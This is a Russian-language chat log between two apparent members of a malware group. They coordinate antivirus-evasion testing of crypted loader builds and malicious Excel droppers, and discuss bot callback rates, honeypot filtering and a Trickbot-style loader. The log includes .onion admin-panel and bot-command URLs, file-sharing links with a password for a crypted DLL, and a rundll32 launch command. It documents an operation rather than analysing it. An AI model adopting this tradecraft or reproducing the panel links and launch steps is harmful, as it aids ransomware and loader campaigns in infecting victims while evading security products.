[11.08.21 15:33:16] collin:		Привет!
[11.08.21 15:33:38] collin:		ты тестил для воида БК - отдельно или в связке с экселем?
[11.08.21 15:39:49] angelo:		привет
[11.08.21 15:39:51] angelo:		в связке
[11.08.21 15:40:12] collin:		кто просил тест с облаком делать?
[11.08.21 15:40:30] angelo:		не понял вопроса
[11.08.21 15:40:54] collin:		я както писал - ставить меня в известность, когда кто-то просит тестировать с включенной функцией облачной защиты
[11.08.21 15:41:19] angelo:		блин
[11.08.21 15:41:26] collin:		все тесты БК по умолчанию с отключенным облаком
[11.08.21 15:41:29] collin:		чья инициатива?
[11.08.21 15:41:37] collin:		БК+связки с ними*
[11.08.21 15:41:58] angelo:		Войд всегда говорил врубать защиту и оставлять только отправку примеров
[11.08.21 15:42:09] angelo:		черт, вылетело вооооообще из головы
[11.08.21 15:42:20] angelo:		мыж детекты на xls проверяем
[11.08.21 15:42:20] collin:		ну мы с ним решали этот вопрос, когда он говорил об этом?
[11.08.21 15:42:40] angelo:		не могу сказать, но точно было
[11.08.21 15:42:47] angelo:		неделю назад
[11.08.21 15:42:49] angelo:		две
[11.08.21 15:43:00] angelo:		это было по умолчанию всегда
[11.08.21 15:43:04] collin:		```
[24.05.2021 16:00:33] <kaktus> ты настаиваешь чтобы тесты проводились с облаком?
[24.05.2021 16:00:46] <void> я не настаиваю
[24.05.2021 16:00:53] <void> мне вообще паралельно
```
[11.08.21 15:43:14] collin:		с конца мая - по умолчанию без облака
[11.08.21 15:43:21] angelo:		ну вот что за блин
[11.08.21 15:43:32] angelo:		я к бк сейчас не прикасаюсь вообще
[11.08.21 15:43:38] angelo:		запуск делаю xls
[11.08.21 15:43:45] collin:		т.е. он тебе дает эксель, а ты не в курсе даже что в нем за нагрузка?
[11.08.21 15:43:47] angelo:		ну почему нельзя ему было предупредить
[11.08.21 15:44:01] angelo:		да про бк понимаю
[11.08.21 15:44:13] angelo:		просто упор делается на xls у нас с ним
[11.08.21 15:44:28] angelo:		чтоб он не детектился
[11.08.21 15:44:37] angelo:		вот сейчас у него детекты именно по xls
[11.08.21 15:44:51] angelo:		уже пол дня не может убрать, я с бк и не думал.........
[11.08.21 15:45:10] collin:		не знаю, пишет что БК плохой)
[11.08.21 15:45:24] angelo:		у него всё плохое
[11.08.21 15:45:31] angelo:		у меня Ексель плохой сегодня стал
[11.08.21 15:45:41] angelo:		до этого был отличный
[11.08.21 15:46:28] collin:		```
(16:10:27) opium: file: C:\Users\Alien\AppData\Local\Temp\Damp\rybbiwdku.exe
(16:10:41) opium: Trojan:Script/Wacatac.B!ml
(16:10:55) hamburger: еще инфа
(16:11:02) hamburger: это статический детект на ехе ?
file: C:\Users\Alien\AppData\Local\Temp\Damp\rybbiwdku.exe
```
[11.08.21 15:46:31] collin:		```
Name: Trojan:Script/Wacatac.B!ml
ID: 2147735503
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Alien\AppData\Local\Temp\Damp\rybbiwdku.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
User: DESKTOP-1OB810V\Alien
Process Name: C:\Windows\System32\rundll32.exe
Security intelligence Version: AV: 1.345.325.0, AS: 1.345.325.0, NIS: 1.345.325.0
Engine Version: AM: 1.1.18400.4, NIS: 1.1.18400.4
```
[11.08.21 15:46:41] collin:		твой отчет?
[11.08.21 15:46:49] angelo:		да, лог с тачки
[11.08.21 15:47:00] collin:		а там был только один детект, или еще один - на эксель или его компоненты?
[11.08.21 15:47:31] angelo:		ща
[11.08.21 15:47:35] angelo:		мы на двух смотрели
[11.08.21 15:47:52] collin:		всмысле на той же машине где вот этот детект - он единственный или еще чтото было
[11.08.21 15:48:03] angelo:		секунду
[11.08.21 15:52:11] angelo:		нет, ткоа этот
[11.08.21 15:52:37] angelo:		но там странная хрень
[11.08.21 15:52:43] angelo:		там сам ексель сыпиться
[11.08.21 15:53:06] angelo:		никогда не было такого
[11.08.21 15:53:11] collin:		я так и понял, они там все меняют каждый день, функцию входную и тд
[11.08.21 15:53:34] collin:		давай так тогда в дальнейшем: когда дает он эксель на тест - уточняй какая нагрузка. Если БК - тестируй с отключенным облаком и отправкой образцов.
[11.08.21 15:53:54] collin:		То что тестим БК и БК всвязке без облака - это со всеми согласовано - с ним самим,  с дереком, с нашими старшими
[11.08.21 15:54:18] angelo:		про отправку образов вообще говорить не стоит, это как дважды два. С облаком ну вот честно даже не вспомнил и даже сейчас не помню
[11.08.21 15:54:38] angelo:		СЕКУНДУ
[11.08.21 15:54:42] angelo:		ещё раз
[11.08.21 15:54:49] angelo:		что ты подразумеваешь в связки и без
[11.08.21 15:55:08] angelo:		ну вот есть xls
[11.08.21 15:55:11] collin:		без - это отдельный файл БК exe или dll крипт
[11.08.21 15:55:20] collin:		xls - это связка уже, он что-то тянет и запускает
[11.08.21 15:55:33] angelo:		без связки мы никогда с ним не тестим
[11.08.21 15:55:59] angelo:		то есть я всегда отрубаю
[11.08.21 15:56:09] collin:		да
[11.08.21 15:56:36] collin:		если отдельно скажет что нужно стопудово с облаком, именно для БК - 1) мне напиши об этом 2) выделяй машину подходяющую для таких тестов
[11.08.21 15:56:46] collin:		т.е. новую, с чистым айпи и тд
[11.08.21 15:57:32] angelo:		значит, у меня для теста отсается только real-time и Tamper ?
[11.08.21 15:58:14] collin:		да
[11.08.21 15:58:20] angelo:		понял
[11.08.21 16:03:38] angelo:		так блин
[11.08.21 16:03:38] angelo:		Войд пишет
[11.08.21 16:04:01] angelo:		`ну так а как без облака тестить ? )`
[11.08.21 16:04:47] collin:		понял, буду общаться с ним
[11.08.21 16:04:55] collin:		а ты на фермах тестил xls?
[11.08.21 16:04:58] collin:		как часто там тестишь?
[11.08.21 16:05:10] angelo:		мы хотели на ферме а потом Войд затих
[11.08.21 16:05:41] angelo:		ну то есть не давал задание на тест на фермах
[11.08.21 16:59:36] angelo:		скажи
[11.08.21 16:59:44] angelo:		если я гетинфо запущу на боевом боте
[11.08.21 16:59:49] angelo:		это ничего страшного ?
[11.08.21 16:59:57] angelo:		бот не стукнул
[11.08.21 17:00:11] angelo:		ВМ новая, сегодняшняя
[11.08.21 17:01:40] angelo:		могу ?
[11.08.21 17:04:05] collin:		на боевом?
[11.08.21 17:04:12] angelo:		ну я хз
[11.08.21 17:04:15] angelo:		есть бот
[11.08.21 17:04:23] collin:		насчет боевых - это к Дереку
[11.08.21 17:04:23] angelo:		я не знаю, мало ли глюк был
[11.08.21 17:04:34] angelo:		по моему ипу не стукнул бот
[11.08.21 17:04:36] collin:		может твой в хани свалился?
[11.08.21 17:04:42] angelo:		да я все посмотрел
[11.08.21 17:06:09] angelo:		детектов не было
[11.08.21 17:06:15] collin:		с этой сборкой была какая-то плавающая проблема - у мануеля на одной машине не стучало
[11.08.21 17:06:29] angelo:		блин
[11.08.21 17:06:30] collin:		но мы не выявили в чем дело - логированный норм прошел, боевой не стучал только
[11.08.21 17:06:35] angelo:		ща
[11.08.21 17:06:38] angelo:		на второй запущу
[11.08.21 17:06:43] collin:		не именно с этой группой и не сегодня, пару дней назад - от этого кодера
[11.08.21 17:06:49] collin:		какая-то плавающая ошибка возможна
[11.08.21 17:07:45] angelo:		ща попробуем на второй
[11.08.21 17:07:47] angelo:		на всяк
[11.08.21 17:14:45] angelo:		а админка менялась ?
[11.08.21 17:15:51] collin:		`https://lch5nnzyb5aof43pitcrzkmnvlr4xkrestpj4cpwstvgej34kqq6wqyd.onion/sOIDFhsAIUfhu42332uygt27634ft7yuaFGyaugkJFsayjegf--_-GBASfdvt23fv/`
[11.08.21 17:15:53] collin:		вот эта сейчас
[11.08.21 17:16:04] collin:		все остальные не юзаются больше
[11.08.21 17:16:09] angelo:		ну вот
[11.08.21 17:16:11] angelo:		КАК всегда
[11.08.21 17:16:13] collin:		в ближайшее время по крайней мере
[11.08.21 17:16:14] angelo:		а я не в курсе
[11.08.21 17:16:41] collin:		пробуй на ней свою учетку и пароль, те что на https://bxbwa6.. были
[11.08.21 17:17:10] collin:		если не пустет - сброшу пароль
[11.08.21 17:17:21] angelo:		ты пока тут ?
[11.08.21 17:17:23] angelo:		10 мин надо
[11.08.21 17:17:26] angelo:		занят ппц
[11.08.21 17:18:00] collin:		тут,
[11.08.21 17:18:04] collin:		Noblesse oblige)
[11.08.21 17:24:50] angelo:		ох, Ми французи
[11.08.21 17:24:52] angelo:		)
[11.08.21 17:25:20] collin:		проверил?
[11.08.21 17:26:49] angelo:		сек
[11.08.21 17:32:12] angelo:		заход есть
[11.08.21 17:33:06] collin:		добавил группу, проверь есть ли боты
[11.08.21 17:33:35] collin:		он там один всего
[11.08.21 17:33:36] angelo:		пока никак
[11.08.21 17:33:40] angelo:		Адаму чет очень срочно надо
[11.08.21 17:33:56] collin:		а перезалогинься тогда туда
[11.08.21 17:33:59] collin:		я только что добавил
[11.08.21 17:34:34] collin:		37.120.205.252 - не твой?
[11.08.21 17:34:40] angelo:		мой
[11.08.21 17:35:02] collin:		перкинул в тестовые
[11.08.21 17:35:07] angelo:		ок
[12.08.21 14:34:54] angelo:		привет
[12.08.21 14:34:58] angelo:		чет не стучит у нас
[12.08.21 14:35:10] angelo:		ну пока точно не стукнул - прошло 4 минуты
[12.08.21 14:35:47] angelo:		норм
[12.08.21 14:35:49] angelo:		стукнул
[12.08.21 14:36:56] collin:		время отстука увеличили во всех сборках
[12.08.21 14:36:58] collin:		привет!
[12.08.21 14:37:03] collin:		до 20 минут нужно ждать
[12.08.21 14:37:08] collin:		в этой 10-15 минут
[12.08.21 14:37:08] angelo:		хрена се
[12.08.21 14:37:11] collin:		она самая долгая
[12.08.21 14:37:27] angelo:		В всегда кипешует сразу и ищет кто виноват )
[12.08.21 14:37:44] collin:		обход ав и едр - мы же как лучше стараемся сделать)
[12.08.21 14:37:58] angelo:		да понятное дело, всё на благо
[13.08.21 09:20:42] angelo:		Привет
[13.08.21 09:20:48] angelo:		чет вчера у ребят было не ладно
[13.08.21 09:20:50] angelo:		с детектами
[13.08.21 09:20:54] angelo:		честно не в курсе
[13.08.21 09:24:40] collin:		привет!
[13.08.21 09:25:07] collin:		кто сказал, где в работе или тесты?
[13.08.21 09:26:01] angelo:		в работе
[13.08.21 09:26:06] angelo:		тестили без облачной
[13.08.21 09:26:15] angelo:		думаю Тенет лучше обьяснит
[13.08.21 09:26:18] angelo:		или Войд
[13.08.21 09:26:28] collin:		ок, жду от них инфы
[13.08.21 14:54:31] angelo:		напомни ещё раз мне
[13.08.21 14:54:40] angelo:		будет ип ЕС насрать ж ?
[13.08.21 14:54:44] angelo:		уйдет в ханики
[13.08.21 14:55:46] collin:		привет!
[13.08.21 14:55:59] collin:		на некоторых группах фильтры, на некоторых нет
[13.08.21 14:56:21] collin:		если фильтры по странам отсекают то бот в ханипоты попадет
[13.08.21 14:56:38] collin:		в ханипотах с ним нельзя раотать, команды ставить и тд - отрабатываться не будут, нужно перекинуть в боты/тестовые
[13.08.21 14:56:49] angelo:		угу я всегда кидаю в тесты
[13.08.21 14:56:56] angelo:		главнео чтоб Литва стукнула
[13.08.21 15:20:43] angelo:		а вот вопрос, никак получается мы не можем узнать детектится бк или тот же xls  без облака
[13.08.21 15:23:15] collin:		ну можно провести тест с облаком же
[13.08.21 15:23:24] collin:		заказать отдельный крипт, подготовить чистую ВМ
[13.08.21 15:23:39] collin:		но на одной ВМ будет не показательно
[13.08.21 15:23:57] collin:		надо минимум 3, если 2 без детекта - тогда норм
[13.08.21 15:24:29] collin:		если настаивают - давайте проведем
[13.08.21 15:24:34] collin:		но ВМ должна быть чистая, адреса чистые
[13.08.21 15:24:44] collin:		требования я давал минимальные к тестовой машине
[13.08.21 15:24:52] angelo:		мдя
[13.08.21 15:24:56] angelo:		это конечно не просто
[13.08.21 15:25:02] angelo:		это уже не тест конечно
[13.08.21 15:25:04] collin:		об этом и речь
[13.08.21 15:25:12] collin:		что не просто
[13.08.21 15:25:14] angelo:		не целесообразно
[13.08.21 15:25:18] collin:		проще - делать прогруз, собирать стату по отстукам
[13.08.21 15:25:31] collin:		Дерек сказал сегодня - вчерашняя сборка отстучало 0 из 4
[13.08.21 15:25:38] collin:		в таких количествах стата конечно не показательно
[13.08.21 15:25:51] collin:		ну поменяли сборку ему, от другого кодера
[13.08.21 15:26:00] angelo:		я вчера менял
[13.08.21 15:26:07] angelo:		давай клирт другой
[13.08.21 15:26:11] collin:		на той по последним данным (2 дня назад) - отстук до 40%
[13.08.21 15:26:23] angelo:		блин, сложно
[13.08.21 15:26:29] angelo:		по факту тест - это рабочий день
[13.08.21 15:26:30] collin:		на спам-раздаче правда
[13.08.21 15:26:37] collin:		у него точечная, другой подход немного надо
[13.08.21 15:26:52] collin:		под это дело заказали такие решения как автоматизация проверок
[13.08.21 15:27:03] collin:		для dll и xls на наших фермах, до сих пор ждем
[13.08.21 15:27:19] collin:		они же по корп-машинам работают - что им вообще даст результат тестов на виндефе?
[13.08.21 15:27:25] angelo:		дадададада, руками это не серьёзно
[13.08.21 15:27:35] collin:		там корп ав и едр стоят
[13.08.21 15:27:44] angelo:		а мы на ферме можем проверять ?
[13.08.21 15:27:52] collin:		надо на фермах гонять на сурьезных АВ
[13.08.21 15:27:56] angelo:		ну да, максимум xls
[13.08.21 15:28:03] collin:		на фермах можем, но пока вручную
[13.08.21 15:28:06] collin:		тоже сложно и долго
[13.08.21 15:28:32] angelo:		это да, тест превращается грубо говоря в работу полноценную
[13.08.21 15:29:10] angelo:		ладно ещё б мои ВМ с АВ были, а тут на удаленке жесть
[13.08.21 15:29:20] collin:		в мае решали эту проблему, и так определились - полноценные тесты не целесообразны, тесты на одной машине с облаком - малопоказательны
[13.08.21 15:29:21] angelo:		а я могу себе поставить а ?
[13.08.21 15:29:35] angelo:		сделать 5 машин
[13.08.21 15:29:40] angelo:		7
[13.08.21 15:29:41] angelo:		с АВ
[13.08.21 15:30:01] collin:		ну ты же вручную на них будешь тестить
[13.08.21 15:30:13] collin:		так и на фермах АВ можно
[13.08.21 15:30:14] angelo:		ну поверь это намного быстрее чем у нас будет
[13.08.21 15:30:27] collin:		некоторые требуют лицензии
[13.08.21 15:30:32] collin:		без них раз в месяц менять
[13.08.21 15:30:37] angelo:		ну вот с этим не просто...
[13.08.21 15:30:42] angelo:		да и пофигу
[13.08.21 15:30:51] angelo:		я тачки меняю очень часто
[13.08.21 15:31:08] collin:		ну ты тут не узнаешь какой надо, АВ тоже не мало таких
[13.08.21 15:31:23] collin:		у нас изначально 4 ключевых было, потом они говорят - Софос Макафи давайте и тд
[13.08.21 15:31:37] collin:		так что из 5-7 машин это дойдет до 10, а потом до 15..
[13.08.21 15:31:45] angelo:		Avast 
Sophos 
Forti 
McAfee 
Eset 
Trend Micro 
BitDefender 
Symantec
[13.08.21 15:31:51] angelo:		ну хотя бы их
[13.08.21 15:32:04] angelo:		ну тож бред
[13.08.21 15:32:06] angelo:		конечно
[13.08.21 15:32:16] angelo:		нужна автоматизация, а скоро её ждать ?
[13.08.21 15:32:35] angelo:		мне админ не сказал ничего конкретного
[13.08.21 15:32:55] collin:		мы месяца три ждем уже, последние полтора говорят типа на днях будет готово
[13.08.21 15:33:11] angelo:		блин ну пусть ФРанц даст премию
[13.08.21 15:33:12] collin:		там админ который занимался этим был перегружен кучей других задач
[13.08.21 15:33:13] angelo:		боженьки
[13.08.21 15:33:19] angelo:		накинуть 200-300 баксов
[13.08.21 15:33:27] angelo:		если за неделю поднимут и всё
[13.08.21 15:33:30] angelo:		как дети блин
[13.08.21 15:33:30] collin:		сейчас перераспределили немного, elroy занимается
[13.08.21 15:33:53] collin:		у него подход серьезный - такого как раньше уже не должно быть
[13.08.21 15:33:54] angelo:		просто ферма то очень нужна
[13.08.21 15:34:02] collin:		озвучит сроки какие-то - значит примерно так и ждать
[13.08.21 15:43:41] angelo:		Элрой вообще молодец парень
[13.08.21 19:07:39] collin:		196.240.54.36 - не твой бот?
[13.08.21 19:18:48] angelo:		эм
[13.08.21 19:18:49] angelo:		онлайн он ?
[13.08.21 19:18:52] angelo:		вроде не мой
[13.08.21 19:18:57] angelo:		не было такого ипа
[13.08.21 19:19:11] angelo:		ребята сегодня кстати не работают
[13.08.21 19:19:58] collin:		опять все плохо с бк?)
[13.08.21 19:20:07] angelo:		неее
[13.08.21 19:20:15] angelo:		у них упали
[13.08.21 19:20:26] angelo:		проксы
[13.08.21 19:20:31] collin:		не предупредили нас..
[13.08.21 19:21:04] collin:		хотя я уже привык, часто так
[13.08.21 19:21:09] angelo:		ага
[13.08.21 19:21:13] angelo:		а я как привык
[13.08.21 19:21:24] angelo:		меня вообще редко предупреждают о чем то
[13.08.21 19:21:30] angelo:		благо с админом подружились
[13.08.21 19:22:00] collin:		вчера 9 разноформатных сборок заказали, 1 отменили чуть позднее после заказа, в итоге в работу пошли 2 сборки только, остальное - в пустую делали)
[13.08.21 19:22:17] collin:		это в целом по разным партнерам
[13.08.21 19:22:22] angelo:		да главное чтоб в дело
[13.08.21 19:22:26] angelo:		а ты чего тут ?
[13.08.21 19:22:39] collin:		да вот пришел - смотрю в админке совсем все плохо
[13.08.21 19:22:53] angelo:		не похоже на тебя )
[13.08.21 19:22:56] collin:		фильтры сломали, 40 хороших ботов в хани упали, партнер "очень доволен"
[13.08.21 19:23:04] angelo:		я правда не понял о чем сказал админ
[13.08.21 19:23:06] angelo:		проксы
[13.08.21 19:23:15] angelo:		кто сломал ?
[13.08.21 19:23:26] collin:		не знаю никто не признался)
[13.08.21 19:23:52] angelo:		упали в ханни  - а вытащить уже нельзя было ?
[13.08.21 19:25:33] collin:		пришел вытащил, партнеры не соориентировались видимо
[13.08.21 19:25:56] angelo:		мля
[13.08.21 19:25:56] angelo:		погоди
[13.08.21 19:26:00] angelo:		у Рамона ?
[13.08.21 19:31:08] angelo:		а я не вижу
[13.08.21 19:31:53] collin:		нет это у Зевса
[13.08.21 19:32:03] angelo:		аа
[13.08.21 19:32:04] collin:		другой пользователь
[13.08.21 19:32:08] angelo:		блин
[13.08.21 19:32:11] angelo:		фигово
[13.08.21 19:32:20] angelo:		а они с бк еще работаеют?
[13.08.21 19:32:26] angelo:		они у нас всё взяли что ли ?)
[13.08.21 19:32:43] angelo:		куда не тыкну Зевс всё юзает
[13.08.21 19:33:00] collin:		и Лео БК заинтересовался, брал на пробу недавно
[13.08.21 19:33:12] collin:		расширяемся потихоньку
[13.08.21 19:33:17] angelo:		ну да, вижу
[13.08.21 19:33:20] angelo:		Лео не знаю
[13.08.21 19:33:27] angelo:		я тока с Зевсом наполовину
[13.08.21 19:33:31] angelo:		и Рамон по бк
[31.08.21 11:50:16] angelo:		привет
[31.08.21 11:50:23] angelo:		а ты в отпуске ?)
[31.08.21 11:52:26] collin:		привет!
[31.08.21 11:52:30] collin:		уже работаю
[31.08.21 11:53:10] angelo:		Войд спрашивал
[31.08.21 11:53:43] collin:		ага, зашел к ним в жабу
[31.08.21 19:30:01] angelo:		писал ?
[31.08.21 19:30:13] collin:		нет еще, собирался
[31.08.21 19:30:21] angelo:		))
[31.08.21 19:30:22] collin:		меня не спрашивал Войд больше или дерек?
[31.08.21 19:30:28] angelo:		не-а
[31.08.21 19:30:31] angelo:		тишина
[31.08.21 19:30:36] angelo:		они завтра начинают да ?
[31.08.21 19:30:44] collin:		не в курсе Войд во внешней жабе или еще где есть?
[31.08.21 19:30:52] collin:		да планировали завтра начать, а сегодня потестить
[31.08.21 19:30:55] angelo:		жаль фермы не сделали на xls тесты
[31.08.21 19:31:03] collin:		но я вот ушел, не дождался крипта и не уверен что ему передали(
[31.08.21 19:31:05] angelo:		не
[31.08.21 19:31:29] angelo:		точно нету
[31.08.21 19:32:20] collin:		я тебе сейчас крипт передам ссылку
[31.08.21 19:32:28] collin:		скинь тогда Воиду как онлайн будет
[31.08.21 19:32:30] collin:		если будет*
[31.08.21 19:32:42] angelo:		давай
[31.08.21 19:32:48] collin:		а ты в его жабе есть?
[31.08.21 19:32:55] angelo:		угу
[31.08.21 19:33:00] angelo:		ещё бы нет
[31.08.21 19:53:16] collin:		```
LLi3??]2Khq>4#6S
https://privatlab.com/s/v/9mYOGAEYlkHZaYDmkbM3
https://privatlab.com/s/d/9mYOGAEYlkHZaYDmkbM3/WkJbd#delete
https://dyncheck.com/scan/id/4f91398e9f21c171b45b3c7f16fb8af0
https://dyncheck.com/scan/id/0a004d5cde80ed7bf1eb4ed9b205c613
```
[31.08.21 19:53:42] collin:		крипт группы g5, запуск: rundll32 file.dll,ElementID
[31.08.21 19:53:46] angelo:		мне перезаливать ?
[31.08.21 19:53:56] collin:		передай плз Воиду если он появится
[31.08.21 19:54:14] angelo:		или утром да ?
[31.08.21 19:54:33] collin:		утром надо будет перепроверять статику видимо
[31.08.21 19:54:35] angelo:		так мне перезалвать над обудет на утро ?
[31.08.21 19:54:50] angelo:		в облако
[31.08.21 19:55:08] collin:		перезаливать?
[31.08.21 19:55:17] angelo:		ну я заливаю на 6 часво обычно
[31.08.21 19:55:27] angelo:		файл лежит в облаке 6 часов
[31.08.21 19:55:29] angelo:		и удаляется
[31.08.21 19:55:36] collin:		аа
[31.08.21 19:55:41] collin:		не там 14 дней срок
[31.08.21 19:55:44] angelo:		понял, значит просто передаю ссылку
[31.08.21 19:55:45] angelo:		ок
[31.08.21 19:55:52] collin:		да просто передай ссылки и пасс
[01.09.21 07:16:53] angelo:		привет, не приходил вчера
[01.09.21 07:17:00] collin:		привет!
[01.09.21 07:17:20] collin:		понятно, хначит сегодня сделаем
[01.09.21 07:18:25] angelo:		сегодня придется руками на фермах xls тестить (
[01.09.21 11:08:47] angelo:		Войд онлайн
[01.09.21 11:09:54] collin:		продублируй
[01.09.21 11:09:55] collin:		привет
[01.09.21 11:10:03] angelo:		Войд онлайн
[02.09.21 10:16:58] angelo:		привет ещё раз
[02.09.21 10:17:05] angelo:		расскажи в трёх словах
[02.09.21 10:17:11] angelo:		а в чем различия трика и бк
[02.09.21 10:17:18] angelo:		если не спрашивал её
[02.09.21 10:17:22] angelo:		ещё
[02.09.21 10:17:28] angelo:		как будет время
[02.09.21 10:17:56] collin:		привет!
[02.09.21 10:18:42] collin:		я мало знаю про трик, только то что там имеется доп.функционал
[02.09.21 10:19:00] collin:		которого нет в БК: стиллеры грабберы всякие, что-то еще возможно (не в курсе)
[02.09.21 10:19:16] angelo:		то есть модули расширенные
[02.09.21 10:19:20] collin:		могу сказать что есть в БК
[02.09.21 10:19:26] collin:		что есть в трике - уточни у Цезаря
[02.09.21 10:19:27] angelo:		просто не понимаю, это два разных инструмента
[02.09.21 10:19:28] collin:		и сравни
[02.09.21 10:19:42] angelo:		или по сути одно и тоже
[02.09.21 10:19:43] angelo:		?
[02.09.21 10:20:16] collin:		есть общий функционал и цели использования: закреп, первая ступень проникновения
[02.09.21 10:20:16] angelo:		принцип один, заражение и подгрузка доп модулей
[09.09.21 15:48:07] collin:		привет!
[09.09.21 15:48:36] collin:		часто Воид просит тест экселя в связке с БК с облаком?
[09.09.21 15:48:41] collin:		последний раз когда было?
[09.09.21 16:26:05] angelo:		не было тестов два дня
[09.09.21 16:26:12] angelo:		раньше были каждый день
[09.09.21 16:26:17] angelo:		не знаю с чем связано
[09.09.21 16:26:19] angelo:		а что ?
[09.09.21 16:26:22] angelo:		в чем проблема ?
[09.09.21 16:26:34] angelo:		ааа
[09.09.21 16:26:40] angelo:		прости на облаке вообще не было тестов
[09.09.21 16:27:22] angelo:		после того случая - больше не тестился бк с облаком
[10.09.21 12:48:57] collin:		привет!
[10.09.21 12:49:00] collin:		```
Еще по БК. Вчера анжело протестировал на нашей ферме сборку длл которую делали для нетволкера. Все чисто кроме сумантика и трендмикро. У тренд микро детект после запуска у сумантеека - после открытия архива.
```
[10.09.21 12:49:06] collin:		ты исходник тестил или крипт?
[10.09.21 12:49:57] angelo:		тестил что дали
[10.09.21 12:50:02] angelo:		крипт
[10.09.21 12:50:04] angelo:		думаю
[10.09.21 12:50:06] angelo:		от Элроя
[10.09.21 12:50:24] angelo:		крипт криптт, туплю
[10.09.21 12:51:25] angelo:		только на битдефендере не протестил
[10.09.21 12:51:40] angelo:		на ВМ был косяк с ним, лицензия закончилась
[10.09.21 12:56:10] collin:		ок
[22.10.21 11:05:23] angelo:		можно пояснить
[22.10.21 11:05:25] angelo:		привет
[26.10.21 08:59:12] angelo:		привет
[26.10.21 09:22:13] collin:		привет!
[26.10.21 09:25:04] angelo:		скажи ты не в курсе
[26.10.21 09:25:20] angelo:		а у нас автотесты есть на дллки ?
[26.10.21 09:25:38] angelo:		надо дллку одну протестирвоатьЮ ты б знал как руками не хочеться
[26.10.21 09:25:57] angelo:		дай угадаю, делает Элрой )
[26.10.21 09:26:06] angelo:		уже делает
[26.10.21 09:26:44] angelo:		понял, блин ну ведь это пипец как удобно !
[26.10.21 09:26:55] angelo:		я один раз потратил часов 6 чтобы через все прокрутить
[26.10.21 09:27:14] angelo:		про xls/doc вообще молчку
[27.10.21 08:01:50] angelo:		привет !
[27.10.21 08:02:04] angelo:		1)
[27.10.21 08:02:08] angelo:		вчера Дерек ждал сборку
[27.10.21 08:08:18] angelo:		мы дали ему 5ую, 10 и 12 не пригодилась
[27.10.21 13:26:17] angelo:		снова я
[27.10.21 13:27:38] angelo:		я тут с ВМ фермой пока сидел
[27.10.21 13:27:43] angelo:		скажи я могу проверить то с облаком ?
[27.10.21 13:27:47] angelo:		сборку
[27.10.21 13:27:56] angelo:		поствить до вечера без нагрузки
[27.10.21 13:28:57] angelo:		зевовскую какую нибудь, но там притезнии были по 39
[27.10.21 13:29:12] angelo:		отдельно
[27.10.21 13:29:30] angelo:		без нагрузки и без вшивания в чего либо
[27.10.21 13:32:34] angelo:		чистые машины поставил, пальцем не трогал, обновил только
[27.10.21 13:33:27] angelo:		39 группу где мне взять? извини что отвлекаю миллион раз =(
[27.10.21 13:35:27] angelo:		спасибо большое
[02.11.21 09:46:08] collin:		привет!
[02.11.21 09:46:23] angelo:		привет !
[02.11.21 09:48:35] angelo:		не в курсе сильно, сегодня ничег оен писал
[02.11.21 09:48:39] angelo:		хорошо
[02.11.21 09:48:40] angelo:		я всегда ЗА !
[02.11.21 09:48:58] angelo:		было да
[02.11.21 09:49:23] angelo:		два вопроса
[02.11.21 09:49:30] angelo:		где взять сборку и где взять нагрузку
[02.11.21 09:57:13] angelo:		ок
[02.11.21 10:18:14] angelo:		скажи а вот бот https://x6rciduomtjt25xigz7onkgxmusuwwuxqvidjkcramwg3lb5vvpsm7ad.onion/dAkEAkFKkzm8QTA3vk1zyS50ArYk8y4le4HtJ6UaWHtus/index.php?r=bots/command&id=629b52302cb26fed0322466088d51983
[02.11.21 10:18:23] angelo:		это сегодняшняя сборка ?
[02.11.21 10:19:21] angelo:		как понять этот момент
[02.11.21 10:40:52] angelo:		да вот про ВНЦ не понятная ситуация
[02.11.21 10:41:10] angelo:		надо понять какая сборка - хочу проверить запуск длл ВНЦ на крипте
[02.11.21 10:42:14] angelo:		да
[02.11.21 10:42:31] angelo:		dl2_x64_19_449.dll
dl2_x64_39_450.dll
[02.11.21 10:42:33] angelo:		да вот написал
[02.11.21 10:42:45] angelo:		и на обоих запустить внц да ?
[02.11.21 10:43:10] angelo:		ну это, он скинул исходникик, сейчас буду брат ькрипты из панели
[09.11.21 09:16:22] angelo:		Элрой сказал вчера
[09.11.21 09:16:30] angelo:		что ты знаешь кто будет делать скрипт для Совоса
[09.11.21 09:16:35] angelo:		Софос
[09.11.21 09:16:43] angelo:		чел кто делал для Вебрута
[09.11.21 09:16:55] angelo:		спросишь у парня когда время будет ?
[09.11.21 09:46:18] angelo:		вопрос
[09.11.21 09:46:31] angelo:		Цезарю надо понять почему трик умирает после запуска с бк
[09.11.21 09:46:35] angelo:		ему нужен
[09.11.21 09:46:50] angelo:		`просил пояснить и скинуть код как там идет запуск, пока не скинули`
[09.11.21 09:51:38] angelo:		и вопрос про БК
[09.11.21 09:51:52] angelo:		после шела вчера умерли боты БК
[09.11.21 09:52:09] angelo:		сейчас ещё раз пущу пару ботов на ВМ для теста и отпишусь точнее
[09.11.21 09:58:52] angelo:		не у меня точно )
[09.11.21 09:58:54] angelo:		ну мертвые есть только
[09.11.21 09:59:24] angelo:		в тестовых
[09.11.21 09:59:24] angelo:		1581690cc677a233cee75273fd7f725f
[09.11.21 09:59:37] angelo:		6366bd40699ce678a9763b653009be3a
[09.11.21 10:02:15] angelo:		после перегруза машины умер
[09.11.21 10:02:28] angelo:		не
[09.11.21 10:02:31] angelo:		боты работали
[09.11.21 10:02:37] angelo:		стуканули в трик
[09.11.21 10:02:48] angelo:		а после перегруза машин, умерли все боты
[09.11.21 10:03:18] angelo:		вроде не просыпались
[09.11.21 10:03:36] angelo:		да шелл без закрепа, а зачем тогда перегруз нужен был...
[09.11.21 10:04:00] angelo:		скажи а зачем вообще смотрим шеллкод запуск трика с бк ?
[09.11.21 10:04:10] angelo:		зевс же запускает трика просто дллкой
[09.11.21 10:06:31] angelo:		изначально то с длл проблемы есть
[09.11.21 10:06:56] angelo:		ох хо хо
[09.11.21 10:07:10] angelo:		а шелл ?
[09.11.21 10:31:44] angelo:		БК оживаем норм
[09.11.21 10:31:49] angelo:		запустил вчерашние тачки
[09.11.21 10:31:53] angelo:		после шелла
[09.11.21 10:31:55] angelo:		никаких траблов
[09.11.21 10:33:43] angelo:		и вот мы возвращаемся к моему вопросу про шелл
[09.11.21 10:34:04] angelo:		зачем смотреть шеллкод, если проблема с запуском длл не решили
[09.11.21 10:34:14] angelo:		с бк на трик
[09.11.21 10:34:41] angelo:		у них боты БК живые, а трик мертвые, эти же боты
[09.11.21 10:36:06] angelo:		угу
[09.11.21 10:36:14] angelo:		не
[09.11.21 10:36:26] angelo:		ща ещё переговорю
[09.11.21 10:38:04] angelo:		нет
